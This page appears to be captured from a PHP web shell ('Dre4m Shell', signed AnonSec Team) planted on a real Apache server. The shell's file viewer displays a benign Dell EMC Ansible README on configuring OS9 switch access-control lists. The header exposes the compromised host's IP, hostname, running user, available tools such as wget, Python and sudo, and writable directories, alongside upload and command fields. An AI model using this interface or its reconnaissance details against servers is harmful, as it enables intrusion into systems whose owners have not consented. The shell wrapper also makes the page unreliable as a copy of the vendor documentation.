Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.142.198.108
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/lib/python3/dist-packages/ansible_collections/dellemc/os9/roles/os9_acl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /usr/lib/python3/dist-packages/ansible_collections/dellemc/os9/roles/os9_acl/README.md
ACL role
========

This role facilitates the configuration of an access-control list (ACL). It supports the configuration of different types of ACLs (standard and extended) for both IPv4 and IPv6, and assigns the access-class to the line terminals. This role is abstracted for Dell EMC PowerSwitch platforms running Dell EMC OS9.

The ACL role requires an SSH connection for connectivity to a Dell EMC OS9 device. You can use any of the built-in OS connection variables.


Role variables
--------------

- Role is abstracted using the `ansible_network_os` variable that can take `dellemc.os9.os9` as the value
- If `os9_cfg_generate` is set to true, the variable generates the role configuration commands in a file
- Any role variable with a corresponding state variable set to absent negates the configuration of that variable
- Setting an empty value for any variable negates the corresponding configuration
- Variables and values are case-sensitive

**os9_acl keys**

| Key        | Type                      | Description                                             | Support               |
|------------|---------------------------|---------------------------------------------------------|-----------------------|
| ``type`` | string (required): ipv4, ipv6, mac        | Configures the L3 (IPv4/IPv6) or L2 (MAC) access-control list | os9 |
| ``name`` | string (required)           | Configures the name of the access-control list | os9 |
| ``description`` | string           | Configures the description about the access-control list | os9 |
| ``remark`` | list           | Configures the ACL remark (see ``remark.*``)  | os9 |
| ``remark.number`` | integer (required)        | Configures the remark sequence number | os9 |
| ``remark.description`` | string        | Configures the remark description | os9 |
| ``remark.state`` | string: absent,present\*   | Deletes the configured remark for an ACL entry if set to absent | os9 |
| ``extended`` | boolean: true,false         | Configures an extended ACL type if set to true; configures a standard ACL if set to false | os9 |
| ``entries`` | list | Configures ACL rules (see ``seqlist.*``) |  os9 |
| ``entries.number`` | integer (required)       | Specifies the sequence number of the ACL rule | os9 |
| ``entries.permit`` | boolean (required): true,false         | Specifies the rule to permit packets if set to true; specifies to reject packets if set to false | os9 |
| ``entries.protocol`` | string (required)       | Specifies the type of protocol or the protocol number to filter | os9 |
| ``entries.source`` | string (required)        | Specifies the source address to match in the packets | os9 |
| ``entries.src_condition`` | string         | Specifies the condition to filter packets from the source address; ignored if MAC | os9 |
| ``entries.destination`` | string (required)      | Specifies the destination address to match in the packets | os9 |
| ``entries.dest_condition`` | string         | Specifies the condition to filter packets to the destination address | os9 |
| ``entries.other_options`` | string         | Specifies the other options applied on packets (count, log, order, monitor, and so on) | os9 |
| ``entries.state`` | string: absent,present\*   | Deletes the rule from the ACL if set to absent | os9 |
| ``stage_ingress`` | list           | Configures ingress ACL to the interface (see ``stage_ingress.*``) | os9 |
| ``stage_ingress.name`` | string (required)        | Configures the ingress ACL filter to the interface with this interface name | os9 |
| ``stage_ingress.state`` | string: absent,present\*   | Deletes the configured ACL from the interface if set to absent | os9 |
| ``stage_ingress.seq_number`` | integer         | Configure the sequence number (greater than 0) to rank precedence for this interface and direction  |
| ``stage_egress`` | list           | Configures egress ACL to the interface (see ``stage_egress.*``) | os9 |
| ``stage_egress.name`` | string (required)        | Configures the egress ACL filter to the interface with this interface name | os9 |
| ``stage_egress.state`` | string: absent,present\*   | Deletes the configured egress ACL from the interface if set to absent | os9 |
| ``lineterminal`` | list | Configures the terminal to apply the ACL (see ``lineterminal.*``) | os9 |
| ``lineterminal.line`` | string (required)      | Configures access-class on the line terminal | os9 |
| ``lineterminal.state`` | string: absent,present\*       | Deletes the access-class from line terminal if set to absent | os9 |
| ``state`` | string: absent,present\*       | Deletes the ACL if set to absent | os9 |

> **NOTE**: Asterisk (\*) denotes the default value if none is specified. 

Connection variables
--------------------

Ansible Dell EMC network roles require connection information to establish communication with the nodes in inventory. This information can exist in the Ansible *group_vars* or *host_vars* directories or inventory, or in the playbook itself.

| Key         | Required | Choices    | Description                                           |
|-------------|----------|------------|-------------------------------------------------------|
| ``ansible_host`` | yes      |            | Specifies the hostname or address for connecting to the remote device over the specified transport |
| ``ansible_port`` | no       |            | Specifies the port used to build the connection to the remote device; if value is unspecified, the `ANSIBLE_REMOTE_PORT` option is used; it defaults to 22 |
| ``ansible_ssh_user`` | no       |            | Specifies the username that authenticates the CLI login for the connection to the remote device; if value is unspecified, the `ANSIBLE_REMOTE_USER` environment variable value is used  |
| ``ansible_ssh_pass`` | no       |            | Specifies the password that authenticates the connection to the remote device.  |
| ``ansible_become`` | no       | yes, no\*   | Instructs the module to enter privileged mode on the remote device before sending any commands; if value is unspecified, the `ANSIBLE_BECOME` environment variable value is used, and the device attempts to execute all commands in non-privileged mode |
| ``ansible_become_method`` | no       | enable, sudo\*   | Instructs the module to allow the become method to be specified for handling privilege escalation; if value is unspecified, the `ANSIBLE_BECOME_METHOD` environment variable value is used |
| ``ansible_become_pass`` | no       |            | Specifies the password to use if required to enter privileged mode on the remote device; if ``ansible_become`` is set to no this key is not applicable |
| ``ansible_network_os`` | yes      /os9, null\*  | Loads the correct terminal and cliconf plugins to communicate with the remote device |

> **NOTE**: Asterisk (_*_) denotes the default value if none is specified.

Example playbook
----------------

This example uses the *os9_acl* role to configure different types of ACLs (standard and extended) for both IPv4 and IPv6 and assigns the access-class to the line terminals. The example creates a *hosts* file with the switch details and corresponding variables. The hosts file should define the `ansible_network_os` variable with the corresponding Dell EMC OS9 name. 

When `os9_cfg_generate` is set to true, it generates the configuration commands as a .part file in the *build_dir* path. By default it is set to false. It writes a simple playbook that only references the *os9_acl* role. 

**Sample hosts file**

    leaf1 ansible_host= <ip_address> 

**Sample host_vars/leaf1**

    hostname: leaf1
    ansible_become: yes
    ansible_become_method: xxxxx
    ansible_become_pass: xxxxx
    ansible_ssh_user: xxxxx
    ansible_ssh_pass: xxxxx
    ansible_network_os: dellemc.os9.os9
    build_dir: ../temp/os9
    os9_acl:
      - type: ipv4
        name: ssh-only
        description: ipv4acl
        extended: true
        remark:
          - number: 5
            description: "ipv4remark"
        entries:
          - number: 5
            permit: true
            protocol: tcp
            source: any
            src_condition: ack
            destination: any
            dest_condition: eq 22
            other_options: count
            state: present
        stage_ingress:
          - name: fortyGigE 1/28
            state: present
        stage_egress:
          - name: fortyGigE 1/28
            state: present
        lineterminal:
          - line: vty 1
            state: present
          - line: vty 2
            state: absent
        state: present
            
**Simple playbook to setup system — leaf.yaml**

    - hosts: leaf1
      roles:
         - dellemc.os9.os9_acl

**Run**

    ansible-playbook -i hosts leaf.yaml

(c) 2017-2020 Dell Inc. or its subsidiaries. All rights reserved.

Anon7 - 2022
AnonSec Team